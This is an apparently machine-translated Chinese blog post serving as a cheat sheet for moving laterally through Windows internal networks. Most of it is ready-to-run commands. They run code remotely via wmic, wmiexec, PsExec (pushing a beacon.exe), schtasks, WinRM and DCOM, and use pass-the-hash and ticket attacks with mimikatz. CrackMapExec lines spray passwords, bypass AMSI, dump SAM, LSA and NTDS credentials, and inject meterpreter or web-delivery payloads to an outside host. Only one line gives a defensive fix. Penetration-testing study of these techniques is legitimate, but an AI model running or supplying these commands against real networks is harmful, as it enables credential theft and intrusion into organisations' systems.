banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
HomeArchives图文

Internal Network Penetration Basics

#渗透测试#内网渗透1617
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
This article discusses internal networks (LANs) and how they can be composed of multiple networks with access control. It also covers UNC paths, WMI, and ports such as 135, 137, 138, and 445, which are used for remote procedure calls and file sharing. The article also explains how to use tools like PsExec and WMIEXEC for lateral movement within a network.

Intranet#

The intranet refers to the internal local area network, commonly known as LAN (local area network). Common home Wi-Fi networks and small business networks typically allow internal computers to directly access router devices, which connect to mobile telecom fiber optics for internet access.

image

The internal local area network can consist of multiple networks (subnets) through switches/firewalls, with access control between multiple subnets. This is a new concept (security domain).

image

For example, a dedicated server storage area is collectively referred to as DMZ (demilitarized zone), operation and maintenance area, internal office area, etc. The commonly mentioned intranet penetration refers to penetration within the local area network, the more challenging aspect of intranet penetration is domain penetration.

KB2871997 & KB2928120#

Microsoft released two patches, KB2871997 and KB2928120, in 2014 to prevent local user network logins on domain hosts, thereby preventing the execution of wmi, psexec, schtasks, at, and file access sharing with local administrator privileges. The local user's Pass-the-Hash (PTH) method has become obsolete; however, the default Administrator account (SID 500) can still perform PTH, and under NTLM disabled conditions, psexec cannot establish remote connections, but using mimikatz can successfully execute attacks.

UNC Path#

The UNC path stands for Universal Naming Convention path, which is a network path format used to identify the location of shared resources on the network. UNC paths allow you to access remote shares within a local network.

A UNC path consists of two backslashes \\, followed by the name or IP address of the remote computer, an optional share name, an optional path, and the file name. For example:

\\ComputerName\ShareName\Path\FileName

Where ComputerName is the name or IP address of the remote computer, ShareName is the share name required to access the share, Path is the path within the shared folder, and FileName is the name of the desired file.

WMI#

WMI (Windows Management Instrumentation) can be described as a method and functionality for managing Windows systems. We can think of it as an API for interacting with the Windows system. The value of WMI in penetration testing lies in the fact that it does not require downloading and installing, as WMI is a built-in feature of Windows systems. Moreover, the entire operation occurs in the computer's memory, leaving no traces.

Port 135#

RPC: Remote Procedure Call service, WMIC (Windows Management Instrumentation) uses this port.

image

The specific usage of wmic is as follows:

# Open a calculator
wmic /node:ip /user:username /password:password PROCESS call create "calc.exe" 

# No echo
wmic /node:192.168.1.56 /user:administrator /password:aab+1s PROCESS call create "calc.exe"
wmic /node:192.168.1.56 /user:administrator /password:aab+1s process call create "cmd.exe /c ipconfig >C:\1.txt"

Connection error message is as follows:

image

If the IP is incorrect, the following message appears:

image

If the password is incorrect, the following message appears:

image

Attempting to connect with another computer, normal access, command execution successful, wmic executed with no echo, must be written to a text file.

image

image

WMIEXEC#

Get an interactive shell

cscript.exe //nologo wmiexec.vbs /shell 192.168.1.56 administrator aab+1s

image

Execute a single command

cscript.exe //nologo wmiexec.vbs /cmd 192.168.1.56 administrator aab+1s "cmdkey /list"

image

As shown above, if a password is provided, if there is no password, you can use wce's hash injection, and then execute wmiexec.

wce –s account:hostname or domain name:LM:NTLM

cscript //nologo wmiexec.vbs /shell 192.168.0.1

If the captured LM hash starts with AAD3 or is labeled No Password, use 32 zeros to replace the LM hash.

wmiexec.exe#

wmiexec.exe ./administrator:[email protected] "whoami"

image

Hash passing

wmiexec.exe -hashes 00000000000000000000000000000000:04cea78fa35a5be51f4aee6375651e8a WIN-P6KD23KACIJ/[email protected] "ipconfig"

https://github.com/rootclay/WMIHACKER/blob/master/README_zh.md

Ports 137, 138, 139#

Ports 137 and 138 are UDP ports primarily used for file transfer within the intranet, while NetBios/SMB services are mainly accessed through port 139.

Port 445#

Shared folders, shared printers

ipc$#

IPC$ is a resource for sharing "named pipes," opened for inter-process communication. By providing trusted usernames and passwords, both parties can establish a secure channel for encrypted data exchange, thus allowing access to remote computers, starting from NT/2000.

At the same time, NT/2000 opened default shares during the initial system installation, which included all logical shares (c$, d$, e$, etc.) and system directories like winnt or admin directories (admin$).

net use \\192.168.1.56\c$ "password" /user:"domain\username"
net use \\192.168.1.56\c$ "aab+1s" /user:administrator

image

Another host net use remote connection

image

Extended Syntax#

net use \\192.168.1.56\c$

# Delete ipc$ connection
net use \\192.168.1.56\ipc$ /del

# Map the target disk to local
net use z: \\192.168.1.56\c$

# Delete mapping
net use z: /del

# Close sharing
net use ipc$ /del

ipc$ empty connection

Lateral Movement SMB (via port 445)#

To utilize SMB services, you must first establish IPC, which can be done through hash passing for remote execution. By default, it returns with System privileges, and the target firewall must have port 445 open and allowed.

psexec#

net use \\192.168.1.56\c$ "aab+1s" /user:administrator

PsExec.exe \\192.168.1.56 whoami

.\PsExec.exe -u administrator -p 123456 \\dc01 cmd

# Interactive shell (same credentials can log in directly)
psexec -accepteula \\ip -s cmd.exe

image

Execution principle

  1. Connect through ipc$, release psexecsvc.exe to the target
  2. Use service management SCManager to remotely create the psexecsvc service and start the service.
  3. The client connects to execute commands, and the server starts the corresponding program and executes the echo data.
  4. After execution, the service is deleted. This is well-documented in Windows logs. Additionally, psexec may occasionally encounter a bug where the service fails to delete successfully, so it is generally not recommended to use psexec; wmiexec is preferred.
C:\WINDOWS\Temp\PsExec.exe -accepteula \\192.168.144.155,192.168.144.196 -u administrator -p admin@123 -d -c C:\WINDOWS\Temp\beacon.exe

image

cs - plugins#

Select the host to jump, jump-psexec64

image

image

Choose an authentication method, if the listener can access the internet, select 1; for internal lateral movement, use smb beacon2.

Directly use the command line.

jump [module] [target] [listener]
jump psexec64 192.168.10.173 local

image

Jump to the target machine via psexec, using known credentials for collision.
image

At this point, the overall topology is as follows, which is a parent-child relationship because it uses the HTTP beacon to connect directly to the team server; if using the SMB beacon, it would be a link relationship.

image

Switch to the SMB beacon.

image

The host IP is followed by four circles.

image

The SMB arrow is yellow.

https://www.cnblogs.com/sup3rman/p/12381874.html

SMBEXEC#

Plain text transmission

smbexec.exe administrator:[email protected]

image

Hash transmission

Hash transmission:
smbexec -hashes :$HASH$ [email protected]
smbexec -hashes :$HASH$ domain/[email protected]

Dump hash

image

image

atexec#

  • Batch
FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator # Batch check IP corresponding plaintext connection 

FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami # Batch check IP corresponding plaintext echo version 

FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%[email protected] whoami # Batch check plaintext corresponding IP echo version 

FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./[email protected] whoami # Batch check HASH corresponding IP echo version

PTH#

In domain/workgroup environments, passwords identical to the current machine exist in memory. During the authentication process, the basic procedure is to collect the password from the user, encrypt it, and then use the encrypted hash of the correct password for future authentication.

After the initial authentication, Windows stores the hash in memory, so the user does not have to enter the password repeatedly.

During credential dumping, we see that we have extracted a large number of hashes. Now, as attackers, we do not know the password. Therefore, during authentication, we provide the hash instead of the password.

Windows compares the hashes and warmly welcomes the attacker. In short, this is the Pass-the-Hash attack.

https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/

mimikatz - PTH#

privilege::debug 
sekurlsa::pth /user:Administrator /domain:WIN-P6KD23KACIJ /ntlm:04cea78fa35a5be51f4aee6375651e8a

image

After the popup window, connect to the shared port to transfer files.

# privilege::debug
# sekurlsa::pth /user:Administrator /domain:WIN-P6KD23KACIJ /ntlm:04cea78fa35a5be51f4aee6375651e8a

image

Copy files

image

References:
Intranet Penetration - Hash Passing Attack

PTK#

Requires patch kb2871997

Use mimikatz to obtain aes256_hmac:
sekurlsa::ekeys
Pass connection: sekurlsa::pth /user:mary/domain:hsyy.com/aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

PTT#

Implementation steps:  
1. Generate ticket kekeo “tgt::ask /user:mary /domain:hsyy.com /ntlm:518b98ad4178a53695dc997aa02d455c”  
2. Import ticket kerberos::ptt [[email protected]_krbtgt](mailto:[email protected]_krbtgt)[email protected]  
3. View credentials klist  
4. Use net use to load dir \192.168.213.163\c$

smbclient#

Authentication login#

  • Plain text
smbclient -L //192.168.10.173 -U Administrator
  • Hash
smbclient.exe -hashes 00000000000000000000000000000000:04cea78fa35a5be51f4aee6375651e8a WIN-P6KD23KACIJ/[email protected]

image

Null session enumeration#

smbclient -N -U "" -L \\192.168.1.214

rpcclient#

# rpcclient -U "" -N 10.10.10.161 
rpcclient $>enumdomusers

# rpcclient -U corp.pentest.lab/administrator 10.10.10.161

cme#

https://mpgn.gitbook.io/crackmapexec/getting-started/installation/installation-on-windows

Execute command#

crackmapexec smb 192.168.10.173 -u administrator -H 04cea78fa35a5be51f4aee6375651e8a -x ipconfig

image

PowerShell

#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'

Bypass ASMI

#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'  --amsi-bypass /path/payload

image

cme network scan#

crackmapexec smb 10.0.0.0/24

image

crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --shares
crackmapexec smb 192.168.10.83 -u airs-win7 -p aab+1s --shares
crackmapexec smb 192.168.10.83 -u airs-win7 -H 04cea78fa35a5be51f4aee6375651e8a --shares

image

Null session enumeration#

cme smb 10.10.10.161 -u '' -p ''
cme smb 10.10.10.161 --pass-pol
cme smb 10.10.10.161 --users
cme smb 10.10.10.161 --groups

cme smb 10.10.10.178 -u 'a' -p '' -shares
cme smb 10.10.10.178 -u -p -shares

# Recursively traverse all shares
crackmapexec smb  -u  -p  -M spider_plus

Credential retrieval#

crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --sam  
crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --lsa
crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --ntds
crackmapexec smb 192.168.10.173 -u administrator -p aab+1s --ntds vss

msf reverse shell#

image

Enumerate active sessions on remote targets#

#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions

#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --shares

Password spraying#

Use spaces to specify multiple usernames/passwords

#~ cme smb 192.168.1.101 -u user1 user2 user3 -p Summer18
#~ cme smb 192.168.1.101 -u user1 -p password1 password2 password3

Specify a dictionary through a text file

#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18
#~ cme smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt

After finding the password, continue to brute force

#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18 --continue-on-success

# One-to-one brute force
#~ cme smb 192.168.1.101 -u user.txt -p password.txt --no-bruteforce --continue-on-success

Authentication#

  • Domain

User/Hash

Retrieve credentials as follows:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::

#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
#~ cme smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
#~ cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'
  • Local authentication
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth
#~ cme smb 192.168.1.0/24 -u '' -p '' --local-auth
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' --local-auth
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' --local-auth
#~ cme smb 192.168.1.0/24 -u localguy -H '13b29964cc2480b4ef454c59562e675c' --local-auth
#~ cme smb 192.168.1.0/24 -u localguy -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-auth

After brute force results, it appears as follows:

	SMB         192.168.1.101    445    HOSTNAME          [+] HOSTNAME\Username:Password (Pwn3d!)

winRM#

#~ cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

# use the latest release, CME is now a binary packaged with all its dependencies
root@payload$ wget https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip

# execute cme (smb, winrm, mssql, ...)
root@payload$ cme smb -L
root@payload$ cme smb -M name_module -o VAR=DATA
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares
root@payload$ cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
root@payload$ cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz
root@payload$ cme mimikatz --server http --server-port 80

at, schtasks,#

  • at

Windows version <2012, in higher versions use the schtasks command.

at [\computername] [[id] [/delete] | /delete [/yes]]
at [\computername] <time> [/interactive] [/every:date[,...] | /next:date[,...]] <command>

Generate smb beacon

image

Upload smb beacon file

image

Add scheduled task

shell at \\192.168.10.173 10:51 c:\local-smb.exe

image

Already running, unable to reverse, smb shell issue.

Switch to web beacon, successfully reversed.

image

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/at

  • schtasks

windows>=2012

schtasks create

Create a task corresponding to the executable file

schtasks /create /sc <scheduletype> /tn <taskname> /tr <taskrun> [/s <computer> [/u [<domain>\]<user> [/p <password>]]] [/ru {[<domain>\]<user> | system}] [/rp <password>] [/mo <modifier>] [/d <day>[,<day>...] | *] [/m <month>[,<month>...]] [/i <idletime>] [/st <starttime>] [/ri <interval>] [{/et <endtime> | /du <duration>} [/k]] [/sd <startdate>] [/ed <enddate>] [/it] [/z] [/f]

schtasks /create /s 192.168.213.163 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\user.bat /F

schtasks run

Execute the file task

schtasks /run /s 192.168.213.163 /tn adduser /i

schtasks delete

Delete the executable file task

schtasks /delect /s 192.168.213.163 /tn adduser /f

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create

sharpwmi#

.\sharpwmi.exe login 192.168.10.1/24 administrator aab+1s cmd whoami

image

CS error

[-] Invoke_3 on EntryPoint failed.

image

nbtscan#

Scan the network by IP to obtain BIOS name (computer name)

image

image

bash$ sudo nbtscan -v -s : 192.168.1.0/24
  • CS plugin

image

winRM#

WinRM (Windows Remote Management) is Microsoft's implementation of the WS management protocol, a standard SOAP-based protocol that allows hardware and operating systems from different vendors to interoperate, enabling management of local or remote servers and providing an interactive command line shell similar to Telnet to reduce the complexity of system administrator operations.

Ports:
HTTP (5985)
HTTPS SOAP (5986)

Prerequisites: Credentials and permissions

CS has a WinRM module.

image

winrm: x86, run a PowerShell script via WinRM
winrm: x64, run a PowerShell script via WinRM

Entering winrm64, the content is as follows:

image

Authentication is required to lateral move; this authentication can be obtained through internal password spraying, historical RDP credentials, etc. Internal password spraying involves attempting known passwords to check for reused passwords, while historical RDP credentials can be obtained if an administrator logged in via RDP on the internal network and recorded the password.

As shown in the figure, the password credential for 192.168.1.214 is already available, but the credential for 192.168.1.55 is unknown; at this point, you can try using the credential for 192.168.1.214.

Select listeners and sessions as needed; the session is the current beacon.

image

Attempt to run, but an error occurred.

jump winrm64 192.168.1.55 test

image

Check the server port status; port 5985 is not open.

image

You can enable port 5985 using the winrm command. The WinRM service is enabled by default on Windows Server 2008, but the port is not open; you need to use winrm quickconfig -q or winrm qc to open the port.

image

  • Enable WinRM service

image

Recheck the port status; port 5985 is now open.

image

  • Enable or disable the firewall command
C:\Windows\system32>netsh advfirewall firewall set rule group="Windows Remote Management" new enable=yes
  • Use PowerShell to connect to the server

You need to enable trusted hosts in advance.

PS C:\Users\Administrator> Set-Item wsman:\localhost\Client\TrustedHosts -value 192.168.1.* -Force
# This command needs to be executed on the client, not on the server.

Or use the following command
winrm set winrm/config/client @{TrustedHosts="*"}
 
PS C:\Users\Administrator> Enter-PSSession 192.168.1.55 -Credential administrator

image

image

Enter credentials, connection successful.

image

Or

New-PSSession -ComputerName 192.168.1.55 -Credential (Get-Credential)
Enter-PSSession 1

image

Operate via CS

beacon> jump winrm64 192.168.1.55 test

image

Successfully returned shell.

image

Repair suggestions:

Disable WinRM

winrm delete winrm/config/listener?IPAdress=*+Transport=HTTP
  • ⚠️ Windows 8, Windows 10, Windows Server 2012 and above systems have WinRM service enabled by default.

evil-winrm#

GitHub - Hackplayers/evil-winrm: The ultimate WinRM shell for hacking/pentesting

WinRS#

WinRS (Windows Remote Shell) is a remote management tool used to run command line commands on Windows remote servers. WinRS uses the WinRM (Windows Remote Management) protocol to send command line requests to remote computers. WinRS is pre-installed in Windows Server 2008 and higher operating systems and can be enabled in Windows 7 and higher operating systems. To use WinRS, you must enable WinRM on the remote server and run commands with administrative privileges on the local computer.

winrs -r:192.168.1.55 "cmd /c ipconfig"

image

# Port reuse
winrs -r:http://192.168.1.55 -u:administrator -p:aab+1s whoami
winrs -r:http://192.168.1.55 -u:administrator -p:aab+1s cmd

DCOM#

DCOM stands for Distributed Component Object Model, a Microsoft distributed system service. It allows applications on computers to connect and communicate over a network. DCOM enables developers to execute code from remote computers and facilitates easier and more flexible communication between applications.

PS C:\Users\Administrator> Get-ChildItem 'registry::HKEY_CLASSES_ROOT\WOW6432Node\CLSID\{49B2791A-B1AE-4C90-9B8E-E860BA07F889}'

image

PS C:\Users\Administrator> $a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.1.55"))

PS C:\Users\Administrator> $a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c hostname > c:\fromdcom.txt","7")

PS C:\Users\Administrator> Get-Content \\192.168.1.55\c$\fromdcom.txt
WIN-BVVD8VFVMPR

image

SCShell#

GitHub - Mr-Un1k0d3r/SCShell: Fileless lateral movement tool that relies on ChangeServiceConfigA to run command

No445#

GitHub - JDArmy/NO445-lateral-movement: command execute without 445 port

References#

https://www.redteam101.tech/offensive-security/lateral-movement/shi-yong-scshell-jin-hang-heng-xiang-yi-dong
https://github.com/BlWasp/CME_cheatSheet
https://mpgn.gitbook.io/crackmapexec/
https://www.hackingarticles.in/lateral-moment-on-active-directory-crackmapexec/
https://www.hackingarticles.in/lateral-movement-over-pass-the-hash/
https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/
http://www.kxsy.work/2022/02/14/nei-wang-shen-tou-zui-shi-yong-de-heng-xiang-yi-dong-zong-jie/
https://www.cnblogs.com/gamewyd/p/6805595.html
https://www.cnblogs.com/zhengna/p/15309006.html
http://k8gege.org/Ladon/WinrmScan.html
https://cloud.tencent.com/developer/article/1937116

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.